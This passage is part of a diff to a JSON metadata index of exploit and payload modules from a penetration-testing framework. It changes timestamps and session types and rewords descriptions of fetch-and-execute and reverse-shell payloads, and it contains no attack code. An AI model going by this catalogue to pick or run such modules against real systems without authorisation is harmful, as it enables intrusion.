||||
]
|
||||
},
|
||||
"exploit_linux/pptp/poptop_negative_read": {
|
||||
"name": "Poptop Negative Read Overflow",
|
||||
@@ -114429,7 +114755,7 @@
|
||||
"Windows",
|
||||
"Linux"
|
||||
],
|
||||
"mod_time": "2020-10-02 17:38:06 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/multi/mysql/mysql_udf_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/mysql/mysql_udf_payload",
|
||||
@@ -114438,8 +114764,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_multi/ntp/ntp_overflow": {
|
||||
"name": "NTP Daemon readvar Buffer Overflow",
|
||||
@@ -114742,7 +115073,7 @@
|
||||
],
|
||||
"platform": "Linux,OSX,Unix,Windows",
|
||||
"arch": "cmd",
|
||||
"rport": 5432,
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
5432
|
||||
],
|
||||
@@ -114755,7 +115086,7 @@
|
||||
"Windows - PowerShell (In-Memory)",
|
||||
"Windows (CMD)"
|
||||
],
|
||||
"mod_time": "2022-04-04 10:32:01 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/postgres/postgres_copy_from_program_cmd_exec",
|
||||
@@ -114764,8 +115095,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_multi/postgres/postgres_createlang": {
|
||||
"name": "PostgreSQL CREATE LANGUAGE Execution",
|
||||
@@ -114789,7 +115125,7 @@
|
||||
],
|
||||
"platform": "Linux,OSX,Unix,Windows",
|
||||
"arch": "cmd",
|
||||
"rport": 5432,
|
||||
"rport": null,
|
||||
"autofilter_ports": [
|
||||
5432
|
||||
],
|
||||
@@ -114799,7 +115135,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2021-02-17 12:33:59 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/multi/postgres/postgres_createlang.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/postgres/postgres_createlang",
|
||||
@@ -114808,8 +115144,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_multi/realserver/describe": {
|
||||
"name": "RealServer Describe Buffer Overflow",
|
||||
@@ -170203,7 +170544,7 @@
|
||||
"targets": [
|
||||
"Windows DLL Dropper"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:20:12 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2020_0787_bits_arbitrary_file_move",
|
||||
@@ -170565,7 +170906,7 @@
|
||||
"targets": [
|
||||
"Windows DLL Dropper"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:25:41 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2020_17136.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2020_17136",
|
||||
@@ -170687,7 +171028,7 @@
|
||||
"targets": [
|
||||
"Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:28:00 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2021_40449.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2021_40449",
|
||||
@@ -170876,7 +171217,7 @@
|
||||
"targets": [
|
||||
"Windows 11"
|
||||
],
|
||||
"mod_time": "2023-06-16 08:32:41 +0000",
|
||||
"mod_time": "2024-02-07 11:30:42 +0000",
|
||||
"path": "/modules/exploits/windows/local/cve_2022_26904_superprofile.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/local/cve_2022_26904_superprofile",
|
||||
@@ -180315,7 +180656,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mssql/lyris_listmanager_weak_pass",
|
||||
@@ -180643,7 +180984,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2023-12-12 09:53:37 +0000",
|
||||
"mod_time": "2024-02-13 13:00:38 +0000",
|
||||
"path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mssql/mssql_linkcrawler",
|
||||
@@ -180697,7 +181038,7 @@
|
||||
"targets": [
|
||||
"Automatic"
|
||||
],
|
||||
"mod_time": "2022-06-29 19:10:52 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/windows/mssql/mssql_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mssql/mssql_payload",
|
||||
@@ -180706,8 +181047,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
"session_types": [
|
||||
"mssql"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/mssql/mssql_payload_sqli": {
|
||||
"name": "Microsoft SQL Server Payload Execution via SQL Injection",
|
||||
@@ -180798,7 +181144,7 @@
|
||||
"targets": [
|
||||
"MySQL on Windows prior to Vista"
|
||||
],
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/windows/mysql/mysql_mof.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mysql/mysql_mof",
|
||||
@@ -180807,8 +181153,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": true,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/mysql/mysql_start_up": {
|
||||
"name": "Oracle MySQL for Microsoft Windows FILE Privilege Abuse",
|
||||
@@ -180842,7 +181193,7 @@
|
||||
"targets": [
|
||||
"MySQL on Windows"
|
||||
],
|
||||
"mod_time": "2023-08-17 19:07:28 +0000",
|
||||
"mod_time": "2024-02-19 10:34:16 +0000",
|
||||
"path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/mysql/mysql_start_up",
|
||||
@@ -180851,8 +181202,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
"session_types": [
|
||||
"mysql"
|
||||
],
|
||||
"needs_cleanup": true,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/mysql/mysql_yassl_hello": {
|
||||
"name": "MySQL yaSSL SSL Hello Message Buffer Overflow",
|
||||
@@ -181937,7 +182293,7 @@
|
||||
"Windows x86",
|
||||
"Windows x64"
|
||||
],
|
||||
"mod_time": "2021-08-20 16:06:16 +0000",
|
||||
"mod_time": "2024-02-14 15:26:34 +0000",
|
||||
"path": "/modules/exploits/windows/postgres/postgres_payload.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/postgres/postgres_payload",
|
||||
@@ -181946,8 +182302,13 @@
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
"session_types": [
|
||||
"postgresql"
|
||||
],
|
||||
"needs_cleanup": true,
|
||||
"actions": [
|
||||
|
||||
]
|
||||
},
|
||||
"exploit_windows/proxy/bluecoat_winproxy_host": {
|
||||
"name": "Blue Coat WinProxy Host Header Overflow",
|
||||
@@ -185380,7 +185741,7 @@
|
||||
"MOF upload",
|
||||
"Command"
|
||||
],
|
||||
"mod_time": "2023-11-24 14:30:40 +0000",
|
||||
"mod_time": "2024-02-02 14:26:43 +0000",
|
||||
"path": "/modules/exploits/windows/smb/psexec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/smb/psexec",
|
||||
@@ -185390,7 +185751,7 @@
|
||||
"notes": {
|
||||
},
|
||||
"session_types": [
|
||||
"SMB"
|
||||
"smb"
|
||||
],
|
||||
"needs_cleanup": null,
|
||||
"actions": [
|
||||
@@ -200083,7 +200444,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200093,7 +200454,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp",
|
||||
@@ -200126,7 +200487,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200136,7 +200497,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid",
|
||||
@@ -200168,7 +200529,7 @@
|
||||
"bwatters-r7",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200178,7 +200539,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_named_pipe",
|
||||
@@ -200210,7 +200571,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200220,7 +200581,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_tcp",
|
||||
@@ -200257,7 +200618,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200267,7 +200628,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4",
|
||||
@@ -200300,7 +200661,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200310,7 +200671,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid",
|
||||
@@ -200342,7 +200703,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200352,7 +200713,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_http",
|
||||
@@ -200386,7 +200747,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200396,7 +200757,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_https",
|
||||
@@ -200428,7 +200789,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200438,7 +200799,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe",
|
||||
@@ -200470,7 +200831,7 @@
|
||||
"bwatters-r7",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200480,7 +200841,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp",
|
||||
@@ -200517,7 +200878,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200527,7 +200888,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4",
|
||||
@@ -200560,7 +200921,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200570,7 +200931,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid",
|
||||
@@ -200602,7 +200963,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200612,7 +200973,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_winhttp",
|
||||
@@ -200644,7 +201005,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200654,7 +201015,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/custom/reverse_winhttps",
|
||||
@@ -200686,7 +201047,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200696,7 +201057,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -200728,7 +201089,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200738,7 +201099,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp",
|
||||
@@ -200767,7 +201128,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nExecute an arbitrary command (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200777,7 +201138,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/exec",
|
||||
@@ -200807,7 +201168,7 @@
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nLoad an arbitrary x64 library path",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200817,7 +201178,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/loadlibrary",
|
||||
@@ -200846,7 +201207,7 @@
|
||||
"Brendan Watters",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -200856,7 +201217,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/messagebox",
|
||||
@@ -200887,7 +201248,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -200898,7 +201259,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -200931,7 +201292,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -200942,7 +201303,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -200976,7 +201337,7 @@
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -200987,7 +201348,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe",
|
||||
@@ -201020,7 +201381,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -201031,7 +201392,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-07-31 16:38:09 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp",
|
||||
@@ -201068,7 +201429,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
|
||||
